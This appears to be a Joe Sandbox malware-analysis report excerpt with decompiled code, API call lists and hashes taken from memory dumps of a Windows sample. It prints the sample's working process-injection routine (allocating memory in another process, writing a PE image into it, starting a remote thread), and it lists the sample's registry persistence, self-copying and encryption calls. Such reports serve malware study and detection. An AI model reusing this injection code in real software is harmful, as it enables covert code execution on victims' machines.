                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 36ecd06a89aa57b90d8c357f961214fcec07c858538c77e126cc97cb183ebb23
                                                                                                                                                                                                                                                                                          • Instruction ID: 5960c75dfc89f625c24b3e5e20d258fbc5b206adc488f1b7e0a0e72f3ab25c16
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36ecd06a89aa57b90d8c357f961214fcec07c858538c77e126cc97cb183ebb23
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251F9B5E00219AFDB18CF94C885FAEB7B5FB48700F108558F615AB2C0D778A985CBA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04002510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                                          					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                                          					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                                          							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                                          							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                                          							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                          								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                                          								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                                          								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							E040026D0(_v16, _v32);
                                                                                                                                                                                                                                                                                          							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                                          								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                                          								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04002516
                                                                                                                                                                                                                                                                                          0x04002521
                                                                                                                                                                                                                                                                                          0x040026c2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002531
                                                                                                                                                                                                                                                                                          0x0400253a
                                                                                                                                                                                                                                                                                          0x0400254b
                                                                                                                                                                                                                                                                                          0x04002554
                                                                                                                                                                                                                                                                                          0x0400256a
                                                                                                                                                                                                                                                                                          0x04002571
                                                                                                                                                                                                                                                                                          0x04002596
                                                                                                                                                                                                                                                                                          0x0400259d
                                                                                                                                                                                                                                                                                          0x040025d7
                                                                                                                                                                                                                                                                                          0x040025e6
                                                                                                                                                                                                                                                                                          0x040025eb
                                                                                                                                                                                                                                                                                          0x040025ee
                                                                                                                                                                                                                                                                                          0x04002600
                                                                                                                                                                                                                                                                                          0x0400263c
                                                                                                                                                                                                                                                                                          0x04002641
                                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                                          0x0400264e
                                                                                                                                                                                                                                                                                          0x04002670
                                                                                                                                                                                                                                                                                          0x04002692
                                                                                                                                                                                                                                                                                          0x04002698
                                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                                          0x0400267d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002683
                                                                                                                                                                                                                                                                                          0x040025b6
                                                                                                                                                                                                                                                                                          0x040025bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040025ca
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040025d0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002573

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                                          • Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,040140B8,00000208), ref: 025252F4
                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 025252FF
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02525307
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 02525D33
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02525D52
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: GetFileSize.KERNEL32(000000FF,00000000), ref: 02525D74
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 02525D9D
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02525DDE
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: CloseHandle.KERNEL32(000000FF), ref: 02525E05
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02525F87
                                                                                                                                                                                                                                                                                            • Part of subcall function 02525CD7: CloseHandle.KERNEL32(00000000), ref: 02525FA7
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 025257D3
                                                                                                                                                                                                                                                                                            • Part of subcall function 02526EC7: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 02526F09
                                                                                                                                                                                                                                                                                            • Part of subcall function 02526EC7: lstrcpy.KERNEL32(-0000043B,04013CA0), ref: 02526F7F
                                                                                                                                                                                                                                                                                            • Part of subcall function 02526EC7: wnsprintfA.SHLWAPI ref: 02526FF6
                                                                                                                                                                                                                                                                                            • Part of subcall function 02526EC7: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0252701B
                                                                                                                                                                                                                                                                                            • Part of subcall function 02526EC7: GetFileSize.KERNEL32(000000FF,00000000), ref: 02527034
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrcpy.KERNEL32(0401434C,0400C5E4), ref: 0252720E
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrlen.KERNEL32(0401189C), ref: 02527244
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrcpy.KERNEL32(00000000,0401189C), ref: 0252725E
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrlen.KERNEL32(00000000), ref: 02527268
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrlen.KERNEL32(0401434C), ref: 02527275
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrcat.KERNEL32(00000000,0401434C), ref: 0252728F
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 025272C7
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: RegCloseKey.ADVAPI32(00000000), ref: 025272D5
                                                                                                                                                                                                                                                                                            • Part of subcall function 025271C7: lstrlen.KERNEL32(00000000), ref: 02527302
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252ABC7: lstrcpy.KERNEL32(?,00000000), ref: 0252ACDA
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252ABC7: CharUpperA.USER32(?), ref: 0252ACE8
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B1B7: GetCurrentProcess.KERNEL32(00000008,?), ref: 0252B1D1
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B1B7: OpenProcessToken.ADVAPI32(00000000), ref: 0252B1D8
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B1B7: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0252B201
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B1B7: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 0252B23E
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B1B7: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 0252B274
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B1B7: EqualSid.ADVAPI32(?,00000000), ref: 0252B28A
                                                                                                                                                                                                                                                                                            • Part of subcall function 02527827: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02527849
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275C7: CreateMutexA.KERNEL32(00000000,00000000,04013CA0,?,025253B2), ref: 025275D3
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275C7: GetLastError.KERNEL32(?,025253B2), ref: 025275D9
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(040140B8,0400C530), ref: 025253C1
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: lstrlen.KERNEL32(00000000), ref: 0252290F
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: lstrlen.KERNEL32(00000000), ref: 02522921
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: wnsprintfA.SHLWAPI ref: 02522984
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: lstrcmpi.KERNEL32(00000104,?), ref: 02522998
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: CopyFileA.KERNEL32(00000104,?,00000000), ref: 025229B7
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: SetFileAttributesA.KERNEL32(?,00000006), ref: 025229C6
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: lstrcpy.KERNEL32(00000104,?), ref: 025229D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: lstrcpy.KERNEL32(00000000,?), ref: 02522A10
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: lstrcpy.KERNEL32(-00000208,00000000), ref: 02522A24
                                                                                                                                                                                                                                                                                            • Part of subcall function 025228E7: CreateThread.KERNEL32(00000000,00000000,040012D0,00000000,00000000,00000000), ref: 02522A3B
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275F7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 02527645
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275F7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000020), ref: 02527679
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275F7: RegDeleteValueA.ADVAPI32(00000000,?), ref: 0252769D
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275F7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 025276D2
                                                                                                                                                                                                                                                                                            • Part of subcall function 025275F7: RegCloseKey.ADVAPI32(00000000), ref: 025276E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 025284B7: RegOpenKeyExA.ADVAPI32(80000001,040118A0,00000000,000F003F,00000000), ref: 025284F7
                                                                                                                                                                                                                                                                                            • Part of subcall function 025284B7: RegQueryValueExA.ADVAPI32(00000000,04011890,00000000,00000003,?,00000020), ref: 02528528
                                                                                                                                                                                                                                                                                            • Part of subcall function 025284B7: RegDeleteValueA.ADVAPI32(00000000,04011890), ref: 02528545
                                                                                                                                                                                                                                                                                            • Part of subcall function 025284B7: RegCloseKey.ADVAPI32(00000000), ref: 0252854F
                                                                                                                                                                                                                                                                                            • Part of subcall function 025276F7: lstrcpy.KERNEL32(?,04013CA0), ref: 0252772E
                                                                                                                                                                                                                                                                                            • Part of subcall function 025276F7: lstrcat.KERNEL32(?,04011898), ref: 02527741
                                                                                                                                                                                                                                                                                            • Part of subcall function 025276F7: RegOpenKeyExA.ADVAPI32(80000001,0252541F,00000000,000F003F,00000000), ref: 0252777A
                                                                                                                                                                                                                                                                                            • Part of subcall function 025276F7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000020), ref: 025277B9
                                                                                                                                                                                                                                                                                            • Part of subcall function 025276F7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 02527802
                                                                                                                                                                                                                                                                                            • Part of subcall function 025276F7: RegCloseKey.ADVAPI32(00000000), ref: 0252780C
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02525737
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 025257BB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcpy$Value$CloseCreatelstrlen$ModuleNameOpen$ProcessQueryTokenVirtual$DeleteFreeHandleInformationSizelstrcatwnsprintf$AllocAttributesCharCopyCurrentEqualErrorExceptionExitFilterInitializeKnownLastMutexReadSleepThreadUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3052622223-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 25e102b083193e98c5abf2ec426d9b6f9097493b73bb8001a981838891cced69
                                                                                                                                                                                                                                                                                          • Instruction ID: 71bf92024910026e7bb6edbe662f3e5c9d75ab3ac2e1ead3bb73f0e678573453
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e102b083193e98c5abf2ec426d9b6f9097493b73bb8001a981838891cced69
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97C148B09443719AEB28DF60DC09BBA77B1BB46341F4840F8E2487A1D0EB795A88CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C768,00000001,00000000), ref: 0252A186
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0252A190
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C798,00000001,00000008), ref: 0252A1BF
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 0252A1E6
                                                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0252A208
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0252A215
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0252A221
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3736710109-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                          • Instruction ID: 146a7e24d4228ae89be99001b2714efb241c6819ea2dd4e82ac25924da187dee
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6316D75A44208EFEB14CF94D848FEE7BB8FB09704F108218F600A62C0D7B99A84CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                          			E001059E6(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                                                                          				void* _v804;
                                                                                                                                                                                                                                                                                          				intOrPtr _v808;
                                                                                                                                                                                                                                                                                          				intOrPtr _v812;
                                                                                                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                                                                                                                                          				long _t17;
                                                                                                                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                                                                                                                          				intOrPtr _t22;
                                                                                                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t31;
                                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                                                                                                          				_t22 = __ecx;
                                                                                                                                                                                                                                                                                          				_t21 = __ebx;
                                                                                                                                                                                                                                                                                          				_t6 = __eax;
                                                                                                                                                                                                                                                                                          				_t34 = _t22 -  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                                                                                                          					asm("repe ret");
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *0x170db8 = _t6;
                                                                                                                                                                                                                                                                                          				 *0x170db4 = _t22;
                                                                                                                                                                                                                                                                                          				 *0x170db0 = _t25;
                                                                                                                                                                                                                                                                                          				 *0x170dac = _t21;
                                                                                                                                                                                                                                                                                          				 *0x170da8 = _t27;
                                                                                                                                                                                                                                                                                          				 *0x170da4 = _t26;
                                                                                                                                                                                                                                                                                          				 *0x170dd0 = ss;
                                                                                                                                                                                                                                                                                          				 *0x170dc4 = cs;
                                                                                                                                                                                                                                                                                          				 *0x170da0 = ds;
                                                                                                                                                                                                                                                                                          				 *0x170d9c = es;
                                                                                                                                                                                                                                                                                          				 *0x170d98 = fs;
                                                                                                                                                                                                                                                                                          				 *0x170d94 = gs;
                                                                                                                                                                                                                                                                                          				asm("pushfd");
                                                                                                                                                                                                                                                                                          				_pop( *0x170dc8);
                                                                                                                                                                                                                                                                                          				 *0x170dbc =  *_t31;
                                                                                                                                                                                                                                                                                          				 *0x170dc0 = _v0;
                                                                                                                                                                                                                                                                                          				 *0x170dcc =  &_a4;
                                                                                                                                                                                                                                                                                          				 *0x170d08 = 0x10001;
                                                                                                                                                                                                                                                                                          				_t11 =  *0x170dc0; // 0x0
                                                                                                                                                                                                                                                                                          				 *0x170cbc = _t11;
                                                                                                                                                                                                                                                                                          				 *0x170cb0 = 0xc0000409;
                                                                                                                                                                                                                                                                                          				 *0x170cb4 = 1;
                                                                                                                                                                                                                                                                                          				_t12 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v812 = _t12;
                                                                                                                                                                                                                                                                                          				_t13 =  *0x159064; // 0xe0656420
                                                                                                                                                                                                                                                                                          				_v808 = _t13;
                                                                                                                                                                                                                                                                                          				 *0x170d00 = IsDebuggerPresent();
                                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                                          				E0010A4FC(_t14);
                                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                                                          				_t17 = UnhandledExceptionFilter(0x110570);
                                                                                                                                                                                                                                                                                          				if( *0x170d00 == 0) {
                                                                                                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                                                                                                          					E0010A4FC(_t17);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059e6
                                                                                                                                                                                                                                                                                          0x001059ec
                                                                                                                                                                                                                                                                                          0x001059ee
                                                                                                                                                                                                                                                                                          0x001059ee
                                                                                                                                                                                                                                                                                          0x001068a5
                                                                                                                                                                                                                                                                                          0x001068aa
                                                                                                                                                                                                                                                                                          0x001068b0
                                                                                                                                                                                                                                                                                          0x001068b6
                                                                                                                                                                                                                                                                                          0x001068bc
                                                                                                                                                                                                                                                                                          0x001068c2
                                                                                                                                                                                                                                                                                          0x001068c8
                                                                                                                                                                                                                                                                                          0x001068cf
                                                                                                                                                                                                                                                                                          0x001068d6
                                                                                                                                                                                                                                                                                          0x001068dd
                                                                                                                                                                                                                                                                                          0x001068e4
                                                                                                                                                                                                                                                                                          0x001068eb
                                                                                                                                                                                                                                                                                          0x001068f2
                                                                                                                                                                                                                                                                                          0x001068f3
                                                                                                                                                                                                                                                                                          0x001068fc
                                                                                                                                                                                                                                                                                          0x00106904
                                                                                                                                                                                                                                                                                          0x0010690c
                                                                                                                                                                                                                                                                                          0x00106917
                                                                                                                                                                                                                                                                                          0x00106921
                                                                                                                                                                                                                                                                                          0x00106926
                                                                                                                                                                                                                                                                                          0x0010692b
                                                                                                                                                                                                                                                                                          0x00106935
                                                                                                                                                                                                                                                                                          0x0010693f
                                                                                                                                                                                                                                                                                          0x00106944
                                                                                                                                                                                                                                                                                          0x0010694a
                                                                                                                                                                                                                                                                                          0x0010694f
                                                                                                                                                                                                                                                                                          0x0010695b
                                                                                                                                                                                                                                                                                          0x00106960
                                                                                                                                                                                                                                                                                          0x00106962
                                                                                                                                                                                                                                                                                          0x0010696a
                                                                                                                                                                                                                                                                                          0x00106975
                                                                                                                                                                                                                                                                                          0x00106982
                                                                                                                                                                                                                                                                                          0x00106984
                                                                                                                                                                                                                                                                                          0x00106986
                                                                                                                                                                                                                                                                                          0x0010698b
                                                                                                                                                                                                                                                                                          0x0010699f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00106955
                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0010696A
                                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00110570), ref: 00106975
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00106991
                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00106998
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
